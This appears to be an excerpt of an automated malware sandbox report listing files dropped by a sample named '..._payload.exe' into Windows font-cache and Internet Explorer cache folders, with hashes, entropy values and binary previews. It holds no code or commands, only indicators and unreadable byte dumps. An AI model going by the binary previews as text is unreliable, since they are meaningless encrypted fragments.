                                                                                                                          SHA-256:9E6DC2CEC883B7F8C464468764C09585DAF191DBB04B49BB9C58E5532EE217D3
                                                                                                                          SHA-512:49213ED91D44202652CE3C741131363E817C0141B2571EC71B38DBF51562D2B0FB3C3883C2615C162B9CB14B17E59E01EF471230EDD030846BB225E0CA207B2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:......wu.K..._Ma.B...........&8Z..L(..............p7w...j..6...c....1..Z.....b.(.I..3b.u...J.J. .NH.....u.Wb%.X<...!...Y9..H...a....."".7...........-..\!'..gBn9k.).S2.....=....8.K..|....W.U....K\....9."H ..\.~...].......^9....a....... .7y<'E..6g.:\A.&...)..._]XkN)v:.8.?./*..._.T..2...y.<..ExP&.fV8T.....)...H...8....yK.6^AV: j@...U.c...u.{.C"\...4W..=Di.S.s7u9...Z..eS..T...Y.A.#g...?....Js*U.*..B.l....6.......Xx.^..p=........Af..9...Q.u....s..g.........s$..-,...U....g...r.U....L...T..4.....E.74R..,\|.;`...:.m0.O]....B....o.. ......f.f.0.......ACt.ce.f3f......R(.F..<.I.....@..%..u...&...M........E.G...h...Zi.V..1.<.S`....p@.j4^.`s....~z.).G......{.R..G..k.>0A.H....<..!.#vN..@C.ud.e...gA-.$s..0'...N#7J...\./.p..!......`95C..z..Y....W..)Y}[.7.I..HK..*..%.....:>5.Pl.c..6.*.U2.M...3..Oc...H.@.../..?.z{I......8.Le.Dch..t....jo,cb.9.....R...*zWe....c.a(....v.......|s..R.[[?,2t|...44rr..4.fF.c........g..R..X..|..H...M....2..^b...}.+e#..E.../.....u...|...O..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):237738
                                                                                                                          Entropy (8bit):7.238498748088618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:MJ8fRzdwHnwPXZmCIUWTafJqwTL/K2/QFP8BWxBZ6aZoRgAttaBr8PfdrgdEKemZ:+m4H2hIUW+Rqa/K2W8w96D1gd+mdqjcx
                                                                                                                          MD5:AE496DACDE3D1EA8E1253C822B02259F
                                                                                                                          SHA1:B65B3A27BDE2A522D85939B841CE881391953D84
                                                                                                                          SHA-256:FC5639EDC2B0E13CEA5EA65FADF51CF8DD1913DD2069E76603E0A40EA1084273
                                                                                                                          SHA-512:79A6A169EA8E38347F1E6EE20D59BC54D1E050B80A772E3CFA4237BAD8BDB3BB295F637195595782CFC48BAAD89B55449BEB591DAD44CDCDB8A96B593C36B573
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....QPD..n..c1Ez.2&...4@..g.C.Y*l...]..yV.R.gO.V...r.....t..n.....5..N .{u.,..T;M....<u.R..A.%R(.Ku.[.....l..*.=.>k......E.J+Sc...!..2.!...6K........L....]..b4TwYm;..5...Bk.KE......#.`..y...t......S.g.(..P...........sx....GT#5.XV2..2.^.r..P......@bX.FI.U..Fj7oV.8..pr{....a......A..']....0T..D.N6.o....~...x..O..Sk..7C.....y......$.c.lsUh.[.......Ruc.V...R&IDY3K5....o.0.`.....)w..._.}u4.....Z%G...AQ............c..'.....P~.z.KZ.n..=).Ag+.?7.8^.5....ttd.j...8{p..{.*.fT._.Ck2..L..8.jDl].i....9<cQ)....G....R.L..1.oT..'../.gDj..F._..(.ogY....8......D6-W....H&.?.V.}..K+..'K......}.72..#...Sm.%D.... <.$5,v....q..?ge.$#:t.b]|.>..3J;.|..o.iJ.p...>n/.1K.....+......1..js...?..z.^x....n....10...+H&).o.7.D.6...Q...T..f 4p7...50O.8'.QT.z.m...4...S=NiFS--3r.hIK. .[I\..J..B...-..X.,.N......9FO....6.H.o..y..~u.Y...:.....q.l8.....jhV,...U..W!=H..P..ZD...p.....X.H..G...,$...;..,.<u..DN.-....H1.....9.}.uVo.:.......\l.M.......x..W-.[......4....,4N..&1n....o0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240706
                                                                                                                          Entropy (8bit):7.264935138018439
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:0BPZ65GIV/zhOC01NUXRzuapSnQZE7L0gT9WTDIW9/wok6ftc7UvMOTZUqeZ/qO:09Z65NNOdc9pSQZE7L0uWwWnQ6yqU/qO
                                                                                                                          MD5:1AB8534DDAC767140C9ABDD44AEB2C77
                                                                                                                          SHA1:ED5B593EE2259E224C5BD070107E8BDC85416D1C
                                                                                                                          SHA-256:B7C5C2BFE5E391027F4549AA96388F1545918B4B53BF8D267161ADF726520CD9
                                                                                                                          SHA-512:4C7185967F4DE6B564040B502F0FDB6677D8EC18F68F0EBE1B2FB980B179B1B74D9909899E800A28586DD2B0C3B1D3B3AC20495D6097F4D9871E4C7FCA0F6ED8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......f[..P....l^.S...(.h.....T..'.n.....^S.J...g....C.......X.....Djd".|....4{R.]..L....Z.wwr..T=..8vX.,.rF@.I....YEq<.j5.rw...^G0s.lA...Dx;.1.S..=e....U....-.T.o.2R.9...y.K...F...4M..Y..\...j~..b..&Sk..4 .7..]/..V...)~.1J..8.]e..0..x.....Y.."..a.d{.B...M.@."...L.... F_3.^...G..l*.4,......9y3...^.....t......M.....HL.]...f.N....."......3.Iu...mb..#E.y.#i......R.......9.)*...{.Y..i0...W.y........)c.eR...k..:O..pex*.5...jZ9....x.!.g......'..l.../.rY...%C.8..:z...w4..]............^..u..........s'.!.E..p..J..'.Ri2...Dct$.[.F...WH....T.H0^..|...z....F|>..k,...m..N.?/.,......5^.Q...+lA.Oh0....,/.l/.<..RT..........]..;.7w.. .e..[..wsaFGI.....F...r....L.."{{.C....Z.0.F.0j%..6*....W..#.e..uX...c_+A.ay.`."..#..<r.H..c.GA?.D...}..q.I.fl.I.<.0..Y.{..`.......#.......7....~W.?.*;.I..(O.AA......Wm$..s~.S6O....I......X....[]&....`.<......G.l...YB.j{...G......^,..U|C.Q..*._R...l.......X.U...ym.&)..b/H..%I.>..C...8YKR...9.A.O.tV'....%R..X....&...Q..Y$_...e

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238518
                                                                                                                          Entropy (8bit):7.233658676503647
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:b5Slz+0oIOr6/Wb09kV+xUiiQxvdb/LIA2:bslWrj0PFbd3V2
                                                                                                                          MD5:C4EDA7ADD0F5C0A9D10D07A1CEBAB0A5
                                                                                                                          SHA1:91C1BEAE6103048ED3954236C3A07F6E3F29D64A
                                                                                                                          SHA-256:E54C5D85659B922A6C22585123A6687750A5026038DD11E76EA9ABAD2FD98B0F
                                                                                                                          SHA-512:4F6DC9D467C7A7478A10574C324DA28F0C91E7730D1E50F7630959C850D0C8100BCF1A758C75CC4F16F03F67E2F4ADF9C2099671B292577B542DAF1DFAFECFCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......7.N6...3...u.......s.n..<W-...._4W..m../jti]...=..WE....OF.....s..\$....H..T...{("....w....p.[...\..^w...m<\.....z..c.~.pLq.^....TI%....}_..p0...\v}..:!.....>f2A?...G..6{p...'....5...o.w...#.......6..-.g......).....0.Z..9g$.,d..;...).^'b......_../.E}.Xpy...&.d..A....pI".}y:...x.a.8'$-.H[.i..p.....a.K1-akuO._...S.eu.r.............*.......\e.!\..zA..._.`:g..*.....a....2Kj.c...+......4:.._........FC.A...v'].u.w.k..!<.,T.#......om..........P(l..... x..r..=.G.#$....P[th....2k.co.'[.e.I.P.o$...qR....N..#.c.b...a....N.B>1@...:f...._.bk.E.<.Q..^.o.9Aq.Y....W....z.'u.rE.1.X~t..'.|Qn.m_.)0.a..Y........>(..Z./I.v..n...2..'.,aNL..$.>....=a..v-........~.-....]........YB'U....Kc?.Q......J.k.)..}<.+.5Fl.P}....O..Hjp..d....L}..7..h.ra......e/.L.u.%..$..!MJ":..h<.a..L......OMp.8.^..rAA%U.D)B.!A.j.6..h.....}...M....8y...Z....=h.d.:,6.t....H.&.D..u......u.WIH....dy...8elJJ....&...t..6hePxP.l...j2q#.-;.!6.`....8......5.0..c.b?:#.U..M..C

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):241282
                                                                                                                          Entropy (8bit):7.260753805777148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:TuvH8dCboW7Mm1kScCzuLLGacxiWAlWaWtfM2mV8+04rtXe+XRKIvpNl081x:5dCboW7MpGsLGa/Zl7Am++Pe+Vi0x
                                                                                                                          MD5:D08073E88D87165EBC7AA1422CCA8CC2
                                                                                                                          SHA1:26CBC489624FECC87EEE4EC87E0472D9C5C10F01
                                                                                                                          SHA-256:91C7085B544D75495993B05F8650858C8659A10EA6036799B7168350E26C481C
                                                                                                                          SHA-512:FCA92C2304D4D535096FD4B12610C290781B47A09D5B96CC79E7CDE8E99139586767987D31BF2D2FF80BFB7CC133EE267D78EBAE77F4129F615B8150EA451D16
                                                                                                                          Malicious:false
                                                                                                                          Preview:......&.Gr...S...._.6....P......b....~i.5...X.....<.e.d98<...1S4.F9.2V....3.........R..d.6...............F.!.../.o.}....;.l...S.\._...8....2.....V......CIV.A...)...m...n..S.....&.......&.@Tw:.R.5.....U.]..QH.7..j.[..!...j......t.9....6.t..N8..[..2."K...j.)IX.?.?f~....j.?rR.%..i...b+..6..L>.a.+2Q..%L9.y2..~.J...pMd.....=.............-..^...B,......)...a..W.`.9a.`.....Tn.R.. f0..N..|..Z..E.u.9..*..z.W.(.&...a...'. ..*......n.Tjy.. ............2Ez..s.|aK.....3O.../<...H{.R.5W ...vv...}....vjK.w.Z.......p.5|...JWT.@.D..8.r=)p.......>..JI.G...pj....L.[~.jF./.@....^..u<.%;E. ...&...R2.Uq.zzJln7O)V-EL.BS# ^z......x:`.W.h%....h.}=L....Q.q......&....R..;L..h..j.>J..w..p..y.......V..S.?-.j.]...B..{.n..I.``.6.o.q.W.l5..E..<..U.DRN.u...Y._.5..;.+.[#.hj.......-...i(.p...Xe....R.g...C.L.:..:K.([^D.^+.\...`.>.\.~..Q..h~.LY.......@.)..X..|f........7Pz...MJ..:....J.8..+[).g..g....7..Y.;.+=.[..i...hM/......YA.p.....q(Td.gl....y.._I..#=...0.."..=...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):237946
                                                                                                                          Entropy (8bit):7.234541147433686
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:lf7wybfVMjJf+YjQSfZkqE2binv4nHF1T0QOa/dKF2AG:lfcybyrQSBkubinv4nr3KVG
                                                                                                                          MD5:E326CA949CCFBCA8A5ABC69B92DBBFAF
                                                                                                                          SHA1:97A06D4C57FF979FDF4B3598FCAF3A1A8D2A1A8A
                                                                                                                          SHA-256:CBBE6EB266EBC44F850DB927E9CAE5A2B1657B8264B392CE7F1BA8E6F0BA0F63
                                                                                                                          SHA-512:B4CB9240D86F2F45440BE09BDF41137FB1BD2570BBF5996E178BBECE35B5D2131E33329481553ADA231E9D5CCF01CBA5D0BF92F472968653D2DDA6B218FCE0EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:........>....B...../..LE./..L..f(.Y...,1./....xr..O.7.....6~.L....J..b.7..Y..2^&1..4.E.Fr.r..(!...\.Y.H$5.fPD.sy...z. .'... t..v}@.......`...aZ...~........O.g.c.k.1......* g....W.|.x.2....J..7m$....H.h..k...gw..._.......G|..@....j...[....)..q...&^U.w..C.Jr.zR.T@Xy...S5.'..Q..-B..Cm.n....p:..$..i2.Qw....}x....ZQu....e.F._...#z...D.Eb.$..k..c,..I.x........r...u......tN..*..&.u.K...;..6V..7mxA.#<0......D.!...4:...fedlc,..IX.b.@..^..-n....T.!.....VNg2.!v>$.f...|...V...,.g..*.2..G.1..<1%.)......=..i..Lgn...]l......Rk.(..T..:.1..6$..>.~.=..W.....$;.?1.T...p...kK../..%.X;,.)N>._.(.i+...`!.....W.#.q.T.~.xd.....JR.....X.xd]V.u,&.j'1.8.X.-h..y....r..PnJ.aU.}.w...;.&...BL.v/8....&h...b...5....Pe.#W..1Rnuq.=.N.7...F.....%.=....^a...n....\.3......n(<....,vw.....a.(.....y..E6ts.....RT..c..........G....,/..J4...*.%2..!..2G.>Y..P........!...\..u.....qp.Yn.2.O....#.z..........Y..0...)#(.e......d|..j.......r......4...;RyO.!....Une^&..3.=..6!=

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240470
                                                                                                                          Entropy (8bit):7.266461793347623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:bASBgx7g9vu0WaxHciRZjaX4VlfdHw1DB58:btCsuqH9Zj44VlfG4
                                                                                                                          MD5:8C98E587CC3B2B30BB3597E7B8315BB2
                                                                                                                          SHA1:AE776E7D32C713283D75411A58B7169D38F144AD
                                                                                                                          SHA-256:943B87A41F8E009A189689FB3D227DFB57FF9F7773B7DDF908E135651DA6956F
                                                                                                                          SHA-512:E2231F3E3DA557E961F736D548E0CF8BED1AE5493AF5D01D99DA23E8A9103B55707074527D18E9376DA1190CB7B953B8049133C87059681A7B70A973BF3C8E0C
                                                                                                                          Malicious:false
                                                                                                                          Preview:........N.I"..?`.:...N..'....Og:.......}...s..rXDCm..;bJ...a...s.U..R7.....eQ.UU...E.."......9dHP...(..i.zO...3Q..Q?`.@.5<.+.18xZ...(7..qt.....D~....]..&..t..,.v.;>WHx...B....~...]..Q.n....B........@.q..t.;.G.......|Ga,...8s..._....Kp.......D.....F.l..E.Z.3..md..Z.R...@d2e8.N....o..X.?..T..%."n.....S.,|....".]..d..'.;l..F..x.[.X.D.....qb.....DL..n.Kfh.T3......u.eE..7.n..qjm..........=m1.f.A.J..:Em..!pB.F..\.....n....u...."...N.....Y....$6.(aZ.D..^.R.gc.pBv..1.;.....1...5..../Ei...hR..P.b.....#.@..|O.%....!.sR.....o.>u`........../..Yp..H5.gO.b...b.=....... ...wT...{.tyz.C....Z.......).}i.t....v.&.4...P...yE.y,....3,\.......y....dL..d.......0&..v..f.8....R.....U......;f)2.. ._.......<...:.jz....;. =...m..@..L..4.Y.a....-.'.pjv)`.....Z.vjqQ..B"8..2W...=X....W.M.":.K=...a....NHC,i..h..".*m.e..t..j.y.!2..B.Z..D.N.A.p.M.y/..E.h9.....P:.U..1F..6.n.L.(1..3.....o....x/....Q..6V.#D.lp[.(FWQ..J~.....).s..../.$......@<]u.fs%/.e../H.....#.9=...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.chk

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.977077555466775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:0KbIN9m4qZ1V3BWTI8vYOYejYuV3tF5NCEN7A6q3ywosL:0K0rm4W3Mt3t/NblDq3yPsL
                                                                                                                          MD5:699F953F3E5DC79E4EB5217D5238CF8F
                                                                                                                          SHA1:2B96EF587CD65B03D99F768AFF38AFE1968DD53F
                                                                                                                          SHA-256:9C5BB360CE117D925B6B0BDB1F55EEB8C15DFA88F6354121C64CB1AF02C24DFD
                                                                                                                          SHA-512:9F3ABB5E2977D2568068D274C727FC7325372AE57980C1B669AF467C5A580E31776E8235256222FEC7F2C7E612EB27568E764C52A06B72A99A032DBA7E840A56
                                                                                                                          Malicious:false
                                                                                                                          Preview:A.....[++}i.]......K........l..A...sr......cr....w.y.N4m.j....>.....G.~.7........]RO.eU..!.#...g...1.....Yr.F....>.:.9.]......2O....=..qf..yPVKI...T...|b.Nj..P'..<[kt..a6B.m.s>...`....P.....?1.A.n......owr[.Z....^2{<:.I.h.%...B....Z..A.I:.,...1....F..t.q..E....5#.!F|.n.W....&/.....m.8\Q.5.D.f...~.....bdQ:!.....b.7,..s......1.A.8w...e.IL...i...V..h..)".|^!....'.)4T....(.....*..w.>..P.b.?./....H...T....l.N...o...E.3....;.....L...N.I...I}L......w..A*4.p.46E..9... .%.B%.]..&....&]...B......x.M[...t.Y}1.Z@W...\%..o].....P..5.(n..~f.X...&B.d..U.XL%..3.......0..l.v.4...%.^.j..y...w....L.Z.5y.A.S. $.o.....5.%.P"..'.A\.=*...W..................a}..1qreVn.y.:&.....xk...n.J.G.u........9.F.#J.$..Bq....;9..573....1..a3.On.O.'XpxZ.0...b..4.(..w...3.Vp.$.}..P..;O..........;.n"$.}]..FF$>.F...-.h.p".....W..OPE...<~......>...c..r.[E.5.C.k.x..,.y7..j.}P..]..<...j.n.Ud...3j_.|.S.h.P...j....y[....Z.*...r..P)3..9.v..|.B..A.....O.3l.De..8.....f.`y.....A4.?..E.&.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):4.010050562658567
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eKFTqgFShKQzaePS9oL4AWslWsIlAoGqx4dwZA6xQA1NOT7VRPDkSSnLRrR7tcIH:eKBBShj36o+sWs2GyQwZYEBX
                                                                                                                          MD5:F45080DDCF7FEEDDFD7DF29BD9070E20
                                                                                                                          SHA1:7EA1B91EDA11F60BF591DFE446F3C90DF89D62D7
                                                                                                                          SHA-256:E6AE461480922E3751AAF05049708C32149361EBD3337AFF7D00071B61CEBA59
                                                                                                                          SHA-512:333F0D1754180B9AA4721901C0910F7B4268B91787A4796BA7F02A4E79DD3B2E206ACD177F4FAB5D4E5601C433B8394F19C1CD74C5D8467FC4F3F9C34BE6B9D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....ep.S.....(.M..h).5`..+.."o..}.N..O..z.r.x....)L....fq..>Lz..o...L2AM....4.Y.)..N,...{F`.?@k=..lWC...i.N...%.c.0....,...>.}BY6<1.7$.....O.1GH......W.'.\S..`..#..|.].0.X.../wB.....{...fR.W.R<.6..-$...i...[...q..k...H...<........G.....ySSe.v.B......rQ.u:.a..\.4.:.D.J...?*..3.Fr..^..R.|n.K....A....>r...........v.0h."x..@j.@.n.....fg......K..^....k....D...}Xg......Rl...Wi..V.(.-5r[...n.Ja.8*.%..i...T..c.B........T..5sF.O.km....^9"N...p.C.W...N....*b..$.n...}...j..J.)....f...xh..2..P.a?.;..\1..>....[..G6H..y.v...aA....Z..1...Vb...,}c..H.Ss..L..{.FV...hp....}2?...O..KS.1^:.u..*...#.....i..X.....6.,..Vm...........6i.r....... ....w.\[`.|.|[.r...w.!.....0..T2C.{W0.y...Vh.$..Y...K..U..u.f.m..j..7...[...6...f..J.o+....."........P4m..^...o;...{?.Q...KJ._2a...-..r}O<.f&k*...Y.RY.&>l.-S...:6.TvRA.0....ms1buT2....&;..0.N?tB.J.>Gj G....md...p...f..e...|..eX.R....V....v..<..zy...[.S.).....znJxe].m.].6..../O...'@FuQ...C...C.....f..b....N...._.w...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2077906203254396
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:3OF6Y8CCu8FXDy5kqhzpP/sWKFARltyhqLY6DE08O1sByp/x/R:8FiF2Cqhzp8nARbGqLY6A7O1+yzR
                                                                                                                          MD5:F5D69C0E904F9C1F08EFF7802A308451
                                                                                                                          SHA1:1419655816DCD949E817288E7B6E5A10D86F1C5F
                                                                                                                          SHA-256:D5C4DBEDA26F40B2DF74A0A58809B12C04A5644F85E318465520092DEFA14AF7
                                                                                                                          SHA-512:4181064D9DFF6831A8DD18EA0E92E2746FC22A10ED93CDA65DD126BF3BB01BDA5D912A76D0628A51DE4B81F7DFA8D72B7CFE0B3E7EC229484225A98720C8687E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....*..%-...A?..n....&...')j...9.|..b........._.c......I.Ep.......va..t.E.TMW.'..K.~..5E.Xg.Cm..@L:.?.!.~...D|@...^=..#v.v.C.-....,.5n......=F...=!..7..,...c........-o..o.)0....g.A~.......N)uw`1n?.6..Y:O./.a.N...`!:...5..2...;N.Pz.<...w8}......2...O.=..9....+..\......$V...~%..(.b8/X...;f...]~..9Gq.d....+.)f.*.i.........=..6...S)R..*].R.62M(.bf....jo..p.s.c.V..9....j.s..I....I. }G.?.."..^.^..x.hD..q..p..f....y.Z.w.f._...('....6...~U.@O.T.x6.?K9}^.....>.$y..Z..1.$.r.........2..+<'F.w.........s.l..`~.0.%......#..b.2T.]L.M...;c.t=>H( .4...7{.h......H.-.NuuBH)9S%.U..S.A.h.O.~|c.F.e..C.:x.(.G...t.Qw.Ps,.O.'.....%ztGv.p..j..5..$..&...l....i?.._.*IJ.@2.......Igf2..<......&...}U...Q..%h;...!....LY..O.G}1W.g....E..L]..a.n..K....8.B>pn.,z..S.*^.Q4b.vu/..1j.R..7.t..b....=.G..{...(m..B.^.mz'..p....J~.3.e.'D.U..m.-B:.*..7......Ex. .`..8..n...}oY'h.Yv$c..s.Tv.K.w#f.A...:....'..`.$.).'..U.U..3`?.Z.f.".ib3..,W^.Za..K.....G.A90d.o..4e...t..`.ta|]>.I..a.W.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2074036102163515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:koXebxhrOHJePu43PdUhkEBoHlbZX/zUjSybzocgYZ0P/+g:nMAHJePuQMvqHlbZXLUjrbzxgK2
                                                                                                                          MD5:4335DEAEAEAF567313A5AD0B7F181C3F
                                                                                                                          SHA1:50547846CA7DAE62407243A6164EF1523487703F
                                                                                                                          SHA-256:7FF626C73C8F1E09785C550E909B0F19495CFC1110DDB1C5E6A3ECEDF889A738
                                                                                                                          SHA-512:F0460E6C9E2F35FAF2518E381655275F4571CDD922988EC4EDF1692C58CD024AE3DD723D21BF7DBCF599A7C5E404DF8B5D59AFE3F92FE9AE19E6F8FFD24B462A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.........O.*.+.C.#...n!A...e...R4.i5.".%....o.....R.Z..:}6..d....M.U?....=[1..k?G.6. ....Yz..w..A...Z.5.x..|..|.b.`.....8p..B.M...+.SP.;.1..j.ar.....y/.'<.\AI...6^.G....L..P..%.G...9j....Z.%.+./E.<.#..N.....Z76.'......`.....:`.m.s....`N.u..........T.......o;H.j..F.)...u,)?..SGP..;.P..x...z.L`..bh....ap.G.4.6d.S..?.g4O.u.r...c. ..d.~..6..,.y...I....^...5..G.w.....S.B.........~.e....../x..|=F} ....f...0.uh.).....4....sc...[.T.>....1...R......./$(SB.c...F.g...G..?.....2..HJB;#...?eA.,...X.....b......Q.N.3n...K.P..#..\...j....[e..s.SDM..Z.A..@ .6<.U.fS..Y{D.Y.A.Q.....L./.CD.T.F..........o:.. &.v.....`U.-S..7.X...V.v]{......8.K.t9..7F...;;.Gq.@[..Y_.......<.(...Q..i.\1.<......c...V.............N>........t.6.+=JO.....=..X..jdW|..T.../..z..N36...N9.L.y...F.5&Z...O.......u....h...7..^..S.47..d.f....%...eX..Pnw...Q@k.~.!......@T.#............{...I..c...,>.jf....|..3..pq3....MI..;...}...t...x..9~.#...i....R..}.KH.G<.n.T.xA....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbtmp.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2078713496716653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:DDEtteOyhU84JvSlmJecedJRqb+18/UmhehpwBFjKVau4hEZxp/JQ9y:DDEXyK8CSWecC8+18x0hpwBFYaBE57
                                                                                                                          MD5:595E2D91EBF11B19599728722103F4C0
                                                                                                                          SHA1:5785F96D74914DC56F02F122258A943839D3FB11
                                                                                                                          SHA-256:65800D04F7B75BE2388F9D94DB90FA410483FF7F296B29402F4C0102CA8F3D09
                                                                                                                          SHA-512:7DDBFDDFF406ADDE07BFB2A61FFCF62E0C5AFD5C07EA4DFA840DED8B8A22F02DD83C4D865A5B23D629A2652BD2599E08E5AC07D56D4B6C5E09A9F22024930D31
                                                                                                                          Malicious:false
                                                                                                                          Preview:......NE.`C...#@.....*..M.B.@..PkQ.P.....Bmk%.F..c.]..%.Iz<.3....0j.km..W.NJ..V;$P.07..(..E...U....G)..Q?E.|*.7..x.L.^....o..:..j...W..o...9.5f.. ...-..DR~.l....e@.T.....`..a.-..Q.O...e7OS@.^I.{.Eo(.N}C......Q.(|..`.......I..m./...U.GiS.A.0.....L..z>$h.A........:.o..h..o...B...Z8....I......R&%N..........,_h)....3...G...Lzm.=ZB.....F@JS.;...G*...aV.=.w../o.Y._X%L..b.9f%h.....krxN....k...i.y..._..O..F...J.GhN..?h...$.rK_..a..o..,...\.E.$....3.....B..u..........p..J7..(.9.e..:..D..x...+..O-.C6.3S."....=}..3....L.FmX..284y.(...0.V..?[N....u.i,.%g;o..3k..i..{......D..../1....N.@.1sy..r.Ie.ao......?]...l.p.....=......J..j..=..VE..P.DK.:....f{...nQ.?*..7ij..;5.y&'k....u...}u...S..+...=<./....5..$n..7'.....#...?..k.H\om......S...p/-o..=...>0c....toF1M<n...,.-A.d.../U.....G.zJ...`.Q..1"!:.Sk...a...'.2....i...@u.k..,.n<.m.=jin..x...+..E}..t....M.v........n.....z.%~..s..5._u..[7..G.gT..m.\.R..u.}.f`..Y..Ms..o.3...S...s.L........YR.+h..{S....#.k/../

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3384
                                                                                                                          Entropy (8bit):7.942981690151207
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:H1FFhMSy7hcmI1RrBOU6moPFD13C2QlYr:XMN1u1Rr0PmodD13Cve
                                                                                                                          MD5:79F8BF2252BE00A2DB9064655F9855EC
                                                                                                                          SHA1:6B83E4894633EC757723E0956E233081689C4959
                                                                                                                          SHA-256:8ECBC0E9CAD87845FE2C103CA950BC1E11BBDAFC90D44A416E694358B941D6A9
                                                                                                                          SHA-512:49F6CDFD441EA59779B284A786A4BA0B641CA3B31CA174D8297FA7ACC94D54DFBD75B43A3877CB28A2926FDFFD8EEA7225601CD7EAE22EA98DDBBC96805414C3
                                                                                                                          Malicious:false
